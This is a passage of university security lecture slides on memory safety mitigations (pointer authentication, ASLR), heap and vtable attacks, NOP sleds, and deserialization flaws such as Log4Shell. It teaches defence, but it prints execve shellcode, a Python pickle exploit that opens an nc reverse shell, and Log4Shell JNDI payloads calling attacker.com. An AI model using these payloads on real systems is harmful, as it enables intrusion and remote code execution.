Context: usually the address where the pointer is located
The same pointer will have a different PAC depending on where in memory it's located
If an attacker copies a pointer and PAC to a different location, the PAC is no longer valid!

Computer Science 161

Fall 2022

72 of 113

Pointer Authentication on ARM

Pointer authentication is supported by:

ARM 8.3 (a new architecture, like x86 or RISC-V)
The latest Apple chips (starting with the A12 and including the new M1), which use ARM
macOS on ARM (operating system)

Probably the biggest benefit for Apple going to ARM

Can take advantage of the more efficient instructions instead of backwards-compatible ones
Usable in both standard user programs and kernel programs (privileged code run by the OS)

x86 has not developed a similar defense

Computer Science 161

Fall 2022

73 of 113

Mitigation: Address Space Layout Randomization (ASLR)

Textbook Chapter 4.11 & 4.12

Computer Science 161

Fall 2022

74 of 113

Recall: Putting Together an Attack

Find a memory safety (e.g. buffer overflow) vulnerability
Write malicious shellcode at a known memory address

Mitigation: Address-space layout randomization

Overwrite the RIP with the address of the shellcode

Mitigation: Stack canaries
Mitigation: Pointer authentication

Return from the function
Begin executing malicious shellcode

Mitigation: Non-executable pages

We can defend against memory safety vulnerabilities by making each of these steps more difficult (or impossible)!

Computer Science 161

Fall 2022

75 of 113

Recall: x86 Memory Layout

Higher addresses

Lower addresses

Stack

Heap
Data
Code

Grows upwards

In theory, x86 memory layout looks like this...

Grows downwards

Computer Science 161

Fall 2022

76 of 113

Recall: x86 Memory Layout

Higher addresses

Lower addresses

Stack

Heap
Data
Code

Grows downwards

Grows upwards

In theory, x86 memory layout looks like this...

Higher addresses

Lower addresses

Unused
Stack
Unused
Heap
Unused
Data
Unused
Code
Unused

...but in practice, it usually looks like this (mostly empty)!

Computer Science 161

Fall 2022

77 of 113

Recall: x86 Memory Layout

Higher addresses

Lower addresses


Stack

Heap

Data

Code

Idea: Put each segment of memory in a different location each time the program is run


Heap

Data

Code

Stack

Computer Science 161

Fall 2022

78 of 113

Address Space Layout Randomization

Address space layout randomization (ASLR): Put each segment of memory in a different location each time the program is run

The attacker can’t know where their shellcode will be because its address changes every time you run the program

ASLR can shuffle all four segments of memory

Randomize the stack: Can’t place shellcode on the stack without knowing the address of the stack
Randomize the heap: Can’t place shellcode on the heap without knowing the address of the heap
Randomize the code: Can’t construct a ROP chain or return-to-libc attack without knowing the address of code
Within each segment of memory, relative addresses are the same (e.g. the RIP is always 4 bytes above the SFP)

Computer Science 161

Fall 2022

79 of 113

ASLR: Efficiency

Recall from 61C

Programs are dynamically linked at runtime
We already have to do the work of going through the executable and rewriting code to contain known addresses before executing it

ASLR has effectively no overhead, since we have to do relocation anyway!

Computer Science 161

Fall 2022

80 of 113

Subverting ASLR

Leak the address of a pointer, whose address relative to your shellcode is known

Relative addresses are usually fixed, so this is sufficient to undo randomization!
Leak a stack pointer: Leak the location of the stack
Leak an RIP: Leak the location of the caller

Guess the address of your shellcode: Brute-force

Randomization usually happens on page boundaries (usually 12 bits for 4 KiB pages)
32-bit: 32 - 12 = 20 bits, 2²⁰ possible pages, which is feasibly brute-forced
64-bit (usually 48-bit addressing): 48 - 12 = 36 bits, 2³⁶ possible pages

Computer Science 161

Fall 2022

81 of 113

Relative Addresses

void vulnerable(char *dest) {

// Format string vulnerability

printf(dest);

}

int main(void) {

int secret = 42;� char buf[20];

fgets(buf, 20, stdin);

vulnerable(buf);

}

...	...	...	...
...	...	...	...
...	...	...	...
RIP of main
SFP of main
secret = 42
buf
buf
buf
buf
buf
dest (arg to vulnerable)
RIP of vulnerable
SFP of vulnerable
format (arg to printf)

We know that the SFP is a pointer to the stack. How would you print the value of the SFP?

secret is 4 bytes below where the SFP points, so its address is 0xbfff0404!

Input:

'%x'

If the output is bfff0408 what is the address of secret?

Computer Science 161

Fall 2022

82 of 113

Combining Mitigations

Textbook Chapter 4.13

Computer Science 161

Fall 2022

83 of 113

Combining Mitigations

Recall: We can use multiple mitigations together

Synergistic protection: one mitigation helps strengthen another mitigation
Force the attacker to find multiple vulnerabilities to exploit the program
Defense in depth

Example: Combining ASLR and non-executable pages

An attacker can't write their own shellcode, because of non-executable pages
An attacker can't use existing code in memory, because they don't know the addresses of those code (ASLR)

To defeat ASLR and non-executable pages, the attacker needs to find two vulnerabilities

First, find a way to leak memory and reveal the address randomization (defeat ASLR)
Second, find a way to write to memory and write a ROP chain (defeat non-executable pages)

Computer Science 161

Fall 2022

84 of 113

Combining Mitigations

Memory safety defenses used by Apple iOS

ASLR is used for user programs (apps) and kernel programs (operating system programs)
Non-executable pages are used whenever possible
Applications are sandboxed to limit the damage of an exploit (TCB is the operating system)

Trident exploit

Developed by the NSO group, a spyware vendor, to exploit iPhones
Exploit Safari with a memory corruption vulnerability → execute arbitrary code in the sandbox
Exploit another vulnerability to read the kernel stack (operating system memory in the sandbox)
Exploit another vulnerability in the kernel (operating system) to execute arbitrary code

Takeaway: Combining mitigations forces the attacker to find multiple vulnerabilities to take over your program. The attacker's job is harder, but not impossible!

Computer Science 161

Fall 2022

85 of 113

Enabling Mitigations

Many mitigations (stack canaries, non-executable pages, ASLR) are effectively free today (insignificant performance impact)
The programmer sometimes has to manually enable mitigations

Example: Enable ASLR and non-executable pages when running a program
Example: Setting a flag to compile a program with stack canaries

If the default is disabling the mitigation, the default will be chosen

Recall: Consider human factors!
Recall: Use fail-safe defaults!

Computer Science 161

Fall 2022

86 of 113

Enabling Mitigations: CISCO

Cisco’s Adaptive Security Appliance (ASA)

Cisco: A major vendor of technology products (one of 30 giant companies in the Dow Jones stock index)
ASA: A network security device that can be installed to protect an entire network (e.g. AirBears2)

Mitigations used by the ASA

No stack canaries
No non-executable pages
No ASLR
Easy for the NSA (or other attackers) to exploit!

Takeaway: Even major companies can forget to enable mitigations. Always enable memory safety mitigations!

Computer Science 161

Fall 2022

87 of 113

Enabling Mitigations: Internet of Things

Takeaway: Many (most?) IoT devices don’t enable basic mitigations

Qualys Security Blog	Link
CVE-2021-3156: Heap-Based Buffer Overflow in Sudo (Baron Samedit)
Animesh Jain	January 26, 2021
The Qualys Research Team has discovered a heap overflow vulnerability in sudo, a near-ubiquitous utility available on major Unix-like operating systems. Any unprivileged user can gain root privileges on a vulnerable host using a default sudo configuration by exploiting this vulnerability.

Computer Science 161

Fall 2022

88 of 113

Summary: Memory Safety Mitigations

Memory-safe languages

Using a memory-safe language (e.g. Python, Java) stops all memory safety vulnerabilities.
Why use a non-memory-safe language?

Commonly-cited reason, but mostly a myth: Performance
Real reason: Legacy, existing code

Writing memory-safe code

Carefully write and reason about your code to ensure memory safety in a non-memory-safe language
Requires programmer discipline, and can be tedious sometimes

Building secure software

Use tools for analyzing and patching insecure code
Test your code for memory safety vulnerabilities
Keep any external libraries updated for security patches

Computer Science 161

Fall 2022

89 of 113

Summary: Memory Safety Mitigations

Mitigation: Non-executable pages

Make portions of memory either executable or writable, but not both
Defeats attacker writing shellcode to memory and executing it
Subversions

Return-to-libc: Execute an existing function in the C library
Return-oriented programming (ROP): Create your own code by chaining together small gadgets in existing library code

Mitigation: Stack canaries

Add a sacrificial value on the stack. If the canary has been changed, someone’s probably attacking our system
Defeats attacker overwriting the RIP with address of shellcode
Subversions

An attacker can write around the canary
The canary can be leaked by another vulnerability (e.g. format string vulnerability)
The canary can be brute-forced by the attacker

Computer Science 161

Fall 2022

90 of 113

Summary: Memory Safety Mitigations

Mitigation: Pointer authentication

When storing a pointer in memory, replace the unused bits with a pointer authentication code (PAC). Before using the pointer in memory, check if the PAC is still valid
Defeats attacker overwriting the RIP (or any pointer) with address of shellcode

Mitigation: Address space layout randomization (ASLR)

Put each segment of memory in a different location each time the program is run
Defeats attacker knowing the address of shellcode
Subversions

Leak addresses with another vulnerability
Brute-force attack to guess the addresses

Combining mitigations

Using multiple mitigations usually forces the attacker to find multiple vulnerabilities to exploit the program (defense-in-depth)

Computer Science 161

Fall 2022

91 of 113

Heap Vulnerabilities

Textbook Chapter 3.6

Computer Science 161

Fall 2022

92 of 113

Targeting Instruction Pointers

Remember: You need to overwrite a pointer that will eventually be jumped to
Stack smashing involves the RIP, but there are other targets too (literal function pointers, etc.)

Computer Science 161

Fall 2022

93 of 113

C++ vtables

C++ is an object-oriented language

C++ objects can have instance variables and methods
C++ has polymorphism: implementations of an interface can implement functions differently, similar to Java

To achieve this, each class has a vtable (table of function pointers), and each object points to its class’s vtable

The vtable pointer is usually at the beginning of the object
To execute a function: Dereference the vtable pointer with an offset to find the function address

Computer Science 161

Fall 2022

94 of 113

C++ vtables

x is an object of type ClassX.

y is an object of type ClassY.

...
instance variable of y
address of vtable of y
...
...
instance variable of x
instance variable of x
address of vtable of x

Heap

...
address of method bar
address of method foo

...
address of method bar
address of method foo

...
method bar of ClassY
...
method foo of ClassY
...
...
method bar of ClassX
...
method foo of ClassX
...

Code

ClassX vtable

ClassY vtable

Computer Science 161

Fall 2022

95 of 113

C++ vtables

...
instance variable of y
address of vtable of y
...
...
instance variable of x
instance variable of x
address of vtable of x

Heap

...
address of method bar
address of method foo

...
address of method bar
address of method foo

...
method bar of ClassY
...
method foo of ClassY
...
...
method bar of ClassX
...
method foo of ClassX
...

Code

To call a method of y, first follow a pointer on the heap to find the vtable…

ClassX vtable

ClassY vtable

… then follow a pointer in the vtable to find the instructions of the method.

Computer Science 161

Fall 2022

96 of 113

C++ vtables

Suppose one of the instance variables of x is a buffer we can overflow.

...
instance variable of y
address of vtable of y
...
...
instance variable of x
instance variable of x
address of vtable of x

Heap

...
address of method bar
address of method foo

...
address of method bar
address of method foo

...
method bar of ClassY
...
method foo of ClassY
...
...
method bar of ClassX
...
method foo of ClassX
...

Code

ClassX vtable

ClassY vtable

Computer Science 161

Fall 2022

97 of 113

C++ vtables

The attacker controls everything above the instance variable of x on the heap, including the vtable pointer for y.

...
instance variable of y
address of vtable of y
...
...
instance variable of x
instance variable of x
address of vtable of x

Heap

...
address of method bar
address of method foo

...
address of method bar
address of method foo

...
method bar of ClassY
...
method foo of ClassY
...
...
method bar of ClassX
...
method foo of ClassX
...

Code

ClassX vtable

ClassY vtable

Computer Science 161

Fall 2022

98 of 113

C++ vtables

...
instance variable of y
address of vtable of y
address of SHELLCODE
SHELLCODE
instance variable of x
instance variable of x
address of vtable of x

Heap

The vtable for y is now a pointer to shellcode. If method foo for y is called, it will execute shellcode!

Heap

...
address of method bar
address of method foo

...
address of method bar
address of method foo

...
method bar of ClassY
...
method foo of ClassY
...
...
method bar of ClassX
...
method foo of ClassX
...

Code

ClassX vtable

ClassY vtable

Computer Science 161

Fall 2022

99 of 113

Heap Vulnerabilities

Heap overflow

Objects are allocated in the heap (using malloc in C or new in C++)
A write to a buffer in the heap is not checked
The attacker overflows the buffer and overwrites the vtable pointer of the next object to point to a malicious vtable, with pointers to malicious code
The next object’s function is called, accessing the vtable pointer

Use-after-free

An object is deallocated too early (using free in C or delete in C++)
The attacker allocates memory, which returns the memory freed by the object
The attacker overwrites a vtable pointer under the attacker’s control to point to a malicious vtable, with pointers to malicious code
The deallocated object’s function is called, accessing the vtable pointer

Computer Science 161

Fall 2022

100 of 113

Top 25 Most Dangerous Software Weaknesses (2020)

100

Rank	ID	Name	Score
[1]	CWE-79	Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')	46.82
[2]	CWE-787	Out-of-bounds Write	46.17
[3]	CWE-20	Improper Input Validation	33.47
[4]	CWE-125	Out-of-bounds Read	26.50
[5]	CWE-119	Improper Restriction of Operations within the Bounds of a Memory Buffer	23.73
[6]	CWE-89	Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')	20.69
[7]	CWE-200	Exposure of Sensitive Information to an Unauthorized Actor	19.16
[8]	CWE-416	Use After Free	18.87
[9]	CWE-352	Cross-Site Request Forgery (CSRF)	17.29
[10]	CWE-78	Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')	16.44
[11]	CWE-190	Integer Overflow or Wraparound	15.81
[12]	CWE-22	Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')	13.67
[13]	CWE-476	NULL Pointer Dereference	8.35
[14]	CWE-287	Improper Authentication	8.17
[15]	CWE-434	Unrestricted Upload of File with Dangerous Type	7.38
[16]	CWE-732	Incorrect Permission Assignment for Critical Resource	6.95
[17]	CWE-94	Improper Control of Generation of Code ('Code Injection')	6.53

Computer Science 161

Fall 2022

101 of 113

Writing Robust Exploits

101

Computer Science 161

Fall 2022

102 of 113

NOP Sleds

Idea: Instead of having to jump to an exact address, make it “close enough” so that small shifts don’t break your exploit
NOP: Short for no-operation or no-op, an instruction that does nothing (except advance the EIP)

A real instruction in x86, unlike RISC-V

Chaining a long sequence of NOPs means that landing anywhere in the sled will bring you to your shellcode

102

nop�nop�nop�nop�nop�nop�nop�nop�nop�nop�nop�nop�nop�nop�xor %eax, %eax�push %eax�push $0x68732f2f�push $0x6e69622f�mov %esp, %ebx�mov %eax, %ecx�mov %eax, %edx�mov $0xb, %al�int $0x80

Computer Science 161

Fall 2022

103 of 113

Serialization

103

No textbook chapter (yet!)

Computer Science 161

Fall 2022

104 of 113

Serialization in Java and Python

Memory safety vulnerabilities are almost exclusively in C

More on memory-safe languages next time

Java and Python have a related problem: serialization

Serialization is a huge land-mine that is easy to trigger

104

Computer Science 161

Fall 2022

105 of 113

Log4Shell Vulnerability

105

	Link
What's the Deal with the Log4Shell Security Nightmare?
Nicholas Weaver	December 10, 2021
We live in a strange world. What started out as a Minecraft prank, where a message in chat like ${jndi:ldap://attacker.com/pwnyourserver} would take over either a Minecraft server or client, has now resulted in a 5-alarm security panic as administrators and developers all over the world desperately try to fix and patch systems before the cryptocurrency miners, ransomware attackers and nation-state adversaries rush to exploit thousands of software packages.

Computer Science 161

Fall 2022

106 of 113

Using Serialization

Motivation

You have some complex data structure (e.g. objects pointing to objects pointing to objects)
You want to save your program state
Or you want to transfer this state to another running copy of your program

Option 1: Manually write and parse a custom file format

Problem: The code and the custom format are probably pretty ugly
Problem: Extra programming work
Problem: You may make errors in your parser

Option 2: Use a serialization library

Automatically converts any object into a file (and back)
Example: serialize is a built-in Java function
Example: pickle is a built-in Python library

106

Computer Science 161

Fall 2022

107 of 113

Serialization Vulnerabilities in pickle (Python)

Serialization libraries can load and save arbitrary objects

Arbitrary objects might contain code that can be executed (e.g. functions)

What if the attacker provides a malicious file to be deserialized?

The victim program loads a serialized file from the attacker
When deserializing the object, the code from the attacker executes!

107

Computer Science 161

Fall 2022

108 of 113

A pickle (Python) exploit

import base64, os, pickle��class RCE:� def __reduce__(self):� cmd = \� 'rm /tmp/f; mkfifo /tmp/f; cat /tmp/f' \� '/bin/sh -i 2>&1 | nc 127.0.0.1 1234 > /tmp/f'� return os.system, (cmd,)��if __name__ == '__main__':� pickled = pickle.dumps(RCE())� print(base64.b64encode(pickled).decode('ascii'))

108

Computer Science 161

Fall 2022

109 of 113

Serialization Vulnerabilities in Java

Exploiting serialization is a little harder in Java

The latest Java includes some protections

Deserialized code is not allowed to call certain libraries

Example: Don't allow a deserialized object to invoke java.lang.Runtime and call exec (which can execute arbitrary programs)
Sometimes called a denylist or blacklist, as we’ll see later

Problem: Denylists are brittle

If you forget to include a dangerous library in your list, attackers can exploit it

Attackers have automated tools to exploit this

Take a common runtime, find snippets of code (“gadgets”) that can be executed, and chain a series of snippets together to create a larger exploit
Example: “ysoserial”

109

Computer Science 161

Fall 2022

110 of 113

Log4j

Logging: Recording information

Being a good programmer, you want to record things that happen

Log4j: A very common Java framework for logging information
Even if your Java code doesn’t use Log4j, you may be importing some third-party code that uses it
Unfortunately, there was a bug added…

110

Computer Science 161

Fall 2022

111 of 113

Log4j and JNDI (Java Naming & Directory Interface)

JNDI (Java Naming & Directory Interface): A service to fetch data from outside places (e.g. the Internet)
Log4j has a pretty powerful format string parser
After the logged string is fully created, Log4j parses the format strings again
Suppose Log4j saw the string ${jndi:ldap://attacker.com/pwnage}

Log4j thinks: “This is a JNDI object I need to include’
Java thinks: “Okay, let’s get that object from attacker.com”
Java thinks: “Okay, let’s deserialize that Java object”

Takeaway: Because a logged string included a reference that Java fetches from the network and deserializes, the attacker can use it to exploit programs!

111

Computer Science 161

Fall 2022

112 of 113

Serialization: Detection and Defenses

Look for serialize in Java and pickle in Python
Can an attacker ever provide input to these functions?

Example: If the code runs on your server and you accept data from users, you should assume that the users might be malicious

Refactor the code to use safe alternatives

JSON (Java Script Object Notation)
Protocol buffers

112

Computer Science 161

Fall 2022

113 of 113

Summary: Memory Safety Vulnerabilities

Buffer overflows: An attacker overwrites unintended parts of memory

Stack smashing: An attacker overwrites saved registers on the stack
Memory-safe code: Fixing code to avoid buffer overflows

Integer memory safety vulnerabilities: An attacker exploits how integers are represented in C memory
Format string vulnerabilities: An attacker exploits the arguments to printf
Heap vulnerabilities: An attacker exploits the heap layout
Serialization vulnerabilities: An attacker provides a malicious object to be deserialized
Writing robust exploits: Making exploits work in different environments
Tomorrow: Defending against memory safety vulnerabilities

113

Computer Science 161

Fall 2022